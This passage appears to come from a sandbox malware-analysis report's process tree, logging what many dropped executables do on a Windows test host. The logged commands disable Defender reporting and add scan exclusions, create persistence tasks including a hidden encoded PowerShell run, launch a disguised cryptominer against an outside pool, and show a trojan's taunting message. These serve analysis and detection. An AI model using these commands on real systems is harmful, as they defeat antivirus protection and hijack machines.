        6⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        7⤵
        Delays execution with timeout.exe
        
        PID:5136
  - - C:\Users\Admin\Pictures\1rfVzdez8rjv7xiJyUjZRMvg.exe
      "C:\Users\Admin\Pictures\1rfVzdez8rjv7xiJyUjZRMvg.exe"
      4⤵
      PID:3912
    - - C:\Users\Admin\AppData\Local\Temp\7zS72A2.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:4496
      - C:\Users\Admin\AppData\Local\Temp\7zS7457.tmp\Install.exe
        
        .\Install.exe /UdidKIT "385118" /S
        6⤵
        
        PID:200
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gXHqnkEfc"
        7⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gXHqnkEfc" /SC once /ST 09:57:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:4404
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bQqfrfOcqJXaOOvqOO" /SC once /ST 15:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe\" pA /gDsite_idWIs 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:4108
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gXHqnkEfc"
        7⤵
        
        PID:2512
  - - C:\Users\Admin\Pictures\UBjvCSWLu2Wgo8xdGwh8QoUE.exe
      "C:\Users\Admin\Pictures\UBjvCSWLu2Wgo8xdGwh8QoUE.exe"
      4⤵
      PID:3052
  - - C:\Users\Admin\Pictures\xTc86FPYwI4av8HXSuO6jsPd.exe
      "C:\Users\Admin\Pictures\xTc86FPYwI4av8HXSuO6jsPd.exe"
      4⤵
      PID:3720
  - - C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe
      "C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"
      4⤵
      PID:740
    - - C:\Users\Admin\AppData\Local\Temp\is-54UO9.tmp\4ujLv5Z6YXMoxcYc6vqcHyMs.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-54UO9.tmp\4ujLv5Z6YXMoxcYc6vqcHyMs.tmp" /SL5="$3046E,140559,56832,C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"
        5⤵
        
        PID:4160
      - C:\Users\Admin\AppData\Local\Temp\is-H6FRO.tmp\444567.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-H6FRO.tmp\444567.exe" /S /UID=lylal220
        6⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\2e-4dbe1-de7-f09b8-8401ead4f22e7\Tyhykepaesha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2e-4dbe1-de7-f09b8-8401ead4f22e7\Tyhykepaesha.exe"
        7⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k 2cba948feb9c53fce4409f0079aec61c.exe & exit
        8⤵
        
        PID:6096
  - - C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe
      "C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"
      4⤵
      PID:2020
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 384
        5⤵
        
        PID:5548
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 388
        5⤵
        
        PID:6100
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 400
        5⤵
        
        PID:5260
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 620
        5⤵
        
        PID:5308
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 624
        5⤵
        
        PID:6028
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 692
        5⤵
        
        PID:3608
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 648
        5⤵
        
        PID:5776
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 704
        5⤵
        
        PID:6044
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 780
        5⤵
        
        PID:5832
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5244
    - - C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe
        
        "C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"
        5⤵
        
        PID:1960
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 348
        6⤵
        
        PID:364
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 324
        6⤵
        
        PID:5244
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 328
        6⤵
        
        PID:2384
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 592
        6⤵
        Executes dropped EXE
        
        PID:200
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 628
        6⤵
        
        PID:5772
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 664
        6⤵
        
        PID:2728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 564
        6⤵
        
        PID:5556
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 680
        6⤵
        
        PID:6844
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 772
        6⤵
        
        PID:7964
  - - C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe
      "C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"
      4⤵
      PID:4060
    - - C:\Users\Admin\AppData\Local\Temp\is-CVOQL.tmp\xi86LmwZnIdpohyoS43cg6Jg.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CVOQL.tmp\xi86LmwZnIdpohyoS43cg6Jg.tmp" /SL5="$3047E,4472587,54272,C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"
        5⤵
        
        PID:1616
  - - C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe
      "C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"
      4⤵
      PID:1676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 384
        5⤵
        
        PID:5608
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 388
        5⤵
        
        PID:6056
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 428
        5⤵
        
        PID:5144
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 620
        5⤵
        
        PID:5932
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 624
        5⤵
        
        PID:5424
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 692
        5⤵
        
        PID:5328
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 708
        5⤵
        
        PID:5680
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 692
        5⤵
        
        PID:5612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 780
        5⤵
        
        PID:5880
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:6108
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Drops startup file
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3608
    - - C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe
        
        "C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"
        5⤵
        
        PID:5540
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 348
        6⤵
        
        PID:3792
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 352
        6⤵
        
        PID:2228
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 364
        6⤵
        
        PID:4888
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 616
        6⤵
        
        PID:1296
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 628
        6⤵
        
        PID:6208
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 664
        6⤵
        
        PID:5640
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 616
        6⤵
        
        PID:7500
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 660
        6⤵
        
        PID:6548
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 704
        5⤵
        
        PID:4588
  - - C:\Users\Admin\Pictures\wuQrN7lJg73nWuNi8ztKAbNY.exe
      "C:\Users\Admin\Pictures\wuQrN7lJg73nWuNi8ztKAbNY.exe"
      4⤵
      PID:5164
  - - C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe
      "C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe" --silent --allusers=0
      4⤵
      PID:3916
    - - C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe
        
        C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.28 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6a899530,0x6a89953c,0x6a899548
        5⤵
        
        PID:4388
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\odg2FEYTs5iKvF4RVV78MLvT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\odg2FEYTs5iKvF4RVV78MLvT.exe" --version
        5⤵
        
        PID:5628
    - - C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe
        
        "C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3916 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240110150735" --session-guid=133a7e0c-ec6f-47dc-80e1-d84f5f73be03 --server-tracking-blob=NDAxMDRkMzMyZTM1NzI5YWYyZTUyNzY5ZjY4NTZiOWM5NjkwZjY2OGE2NTZkMmJiOTVkMWZmMWZjMWUxYzNjYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNDg5OTE4OS42NTg1IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4MzNkODM3Ny04N2Q3LTQwZGItYmVhOC00ZjM2NjJiYjYyNWMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5804000000000000
        5⤵
        
        PID:5984
      - C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe
        
        C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.28 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x69fb9530,0x69fb953c,0x69fb9548
        6⤵
        
        PID:5940
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
        5⤵
        
        PID:7000
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:7432
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401101507351\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x250,0x254,0x258,0x20c,0x25c,0xd42614,0xd42620,0xd4262c
        6⤵
        
        PID:7524
  - - C:\Users\Admin\Pictures\Fee43Liu8jsmJxLuC5rYw7q8.exe
      "C:\Users\Admin\Pictures\Fee43Liu8jsmJxLuC5rYw7q8.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
      4⤵
      PID:5824
  - - C:\Users\Admin\Pictures\WLtBnfLYUgwAWQ58Nddtr3eR.exe
      "C:\Users\Admin\Pictures\WLtBnfLYUgwAWQ58Nddtr3eR.exe"
      4⤵
      PID:7764
  - - C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe
      "C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"
      4⤵
      PID:6760
    - - C:\Users\Admin\AppData\Local\Temp\is-4K4I9.tmp\9Lati8rG1WqatsFoe64FHPb3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4K4I9.tmp\9Lati8rG1WqatsFoe64FHPb3.tmp" /SL5="$30716,4472587,54272,C:\Users\Admin\Pictures\9Lati8rG1WqatsFoe64FHPb3.exe"
        5⤵
        
        PID:7516
  - - C:\Users\Admin\Pictures\CMVI26JLyEGTxhVlk9eyKjKW.exe
      "C:\Users\Admin\Pictures\CMVI26JLyEGTxhVlk9eyKjKW.exe"
      4⤵
      PID:5624
  - - C:\Users\Admin\Pictures\y1CcAWeg6a1LjR3sYNmYEAsu.exe
      "C:\Users\Admin\Pictures\y1CcAWeg6a1LjR3sYNmYEAsu.exe"
      4⤵
      PID:6332
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 384
        5⤵
        
        PID:1680
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 412
        5⤵
        
        PID:7544
  - - C:\Users\Admin\Pictures\wPpRIf3bcoVCf0WBbQjmtWjJ.exe
      "C:\Users\Admin\Pictures\wPpRIf3bcoVCf0WBbQjmtWjJ.exe"
      4⤵
      PID:1096
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 384
        5⤵
        
        PID:7984
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 360
        5⤵
        
        PID:6420
  - - C:\Users\Admin\Pictures\vpc7O7LFnIjjCIqT97KnRBP6.exe
      "C:\Users\Admin\Pictures\vpc7O7LFnIjjCIqT97KnRBP6.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
      4⤵
      PID:8124
  - - C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe
      "C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"
      4⤵
      PID:3164
    - - C:\Users\Admin\AppData\Local\Temp\is-G18NN.tmp\W4FuyPZb1bRPwxjAPdQQa3X6.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-G18NN.tmp\W4FuyPZb1bRPwxjAPdQQa3X6.tmp" /SL5="$3061C,140559,56832,C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"
        5⤵
        
        PID:8016
  - - C:\Users\Admin\Pictures\vwgwACrMaR9zvWroL7G8qdZP.exe
      "C:\Users\Admin\Pictures\vwgwACrMaR9zvWroL7G8qdZP.exe"
      4⤵
      PID:7648
    - - C:\Users\Admin\AppData\Local\Temp\7zS75FC.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:7144
      - C:\Users\Admin\AppData\Local\Temp\7zS1048.tmp\Install.exe
        
        .\Install.exe /UdidKIT "385118" /S
        6⤵
        
        PID:4584
  - - C:\Users\Admin\Pictures\DliT9f9gXbeoJkiIb7GAZgOS.exe
      "C:\Users\Admin\Pictures\DliT9f9gXbeoJkiIb7GAZgOS.exe"
      4⤵
      PID:6328
    - - C:\Users\Admin\AppData\Local\Temp\7zSF723.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:6188
      - C:\Users\Admin\AppData\Local\Temp\7zS8D1A.tmp\Install.exe
        
        .\Install.exe /UdidKIT "385118" /S
        6⤵
        
        PID:6704
  - - C:\Users\Admin\Pictures\iFJ5E5msoFtA6RkAVJYCTniC.exe
      "C:\Users\Admin\Pictures\iFJ5E5msoFtA6RkAVJYCTniC.exe"
      4⤵
      PID:7760
- C:\Users\Admin\AppData\Local\Temp\Files\south.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\south.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3640
- C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2252
- C:\Users\Admin\AppData\Local\Temp\Files\YT.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\YT.exe"
  2⤵
  PID:3456
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:5100
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC3CA.tmp.bat""
    3⤵
    PID:1584
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:1668
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:2504
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        
        PID:3920
- C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe"
  2⤵
  PID:2512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
    3⤵
    PID:5084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
    3⤵
    PID:1560
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:4660
- - C:\Windows\System\svchost.exe
    "C:\Windows\System\svchost.exe" formal
    3⤵
    PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
      4⤵
      PID:6124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
      4⤵
      PID:5292
- C:\Users\Admin\AppData\Local\Temp\Files\macheri.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\macheri.exe"
  2⤵
  PID:5600
- C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"
  2⤵
  PID:6060
- - C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"
    3⤵
    PID:2364
- C:\Users\Admin\AppData\Local\Temp\Files\ajajjajajaj.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ajajjajajaj.exe"
  2⤵
  PID:6052
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\portBrowserWebFontwin\Wpqih7cz6fMRtU.vbe"
    3⤵
    PID:3464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\portBrowserWebFontwin\l1IRr8npYRL3m1TwDlV7BI8krChTb4.bat" "
      4⤵
      PID:3516
    - - C:\portBrowserWebFontwin\componentwin.exe
        
        "C:\portBrowserWebFontwin/componentwin.exe"
        5⤵
        
        PID:2148
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\qemu-ga.exe'
        6⤵
        
        PID:4332
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
        6⤵
        
        PID:4700
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hypersavesIntoRuntime\ShellExperienceHost.exe'
        6⤵
        
        PID:6960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hypersavesIntoRuntime\p5DlgEMx5gYcoGktfGFhOQrx.exe'
        6⤵
        
        PID:5808
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\conhost.exe'
        6⤵
        
        PID:6948
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RrF7ZgKlAD.bat"
        6⤵
        
        PID:6188
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1172
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:6712
        
        C:\Recovery\WindowsRE\conhost.exe
        
        "C:\Recovery\WindowsRE\conhost.exe"
        7⤵
        
        PID:7916
- C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"
  2⤵
  PID:5400
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E83.tmp\6E84.tmp\6E85.bat C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"
    3⤵
    PID:4900
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:5292
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:4404
  - - C:\Windows\explorer.exe
      explorer
      4⤵
      PID:5496
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
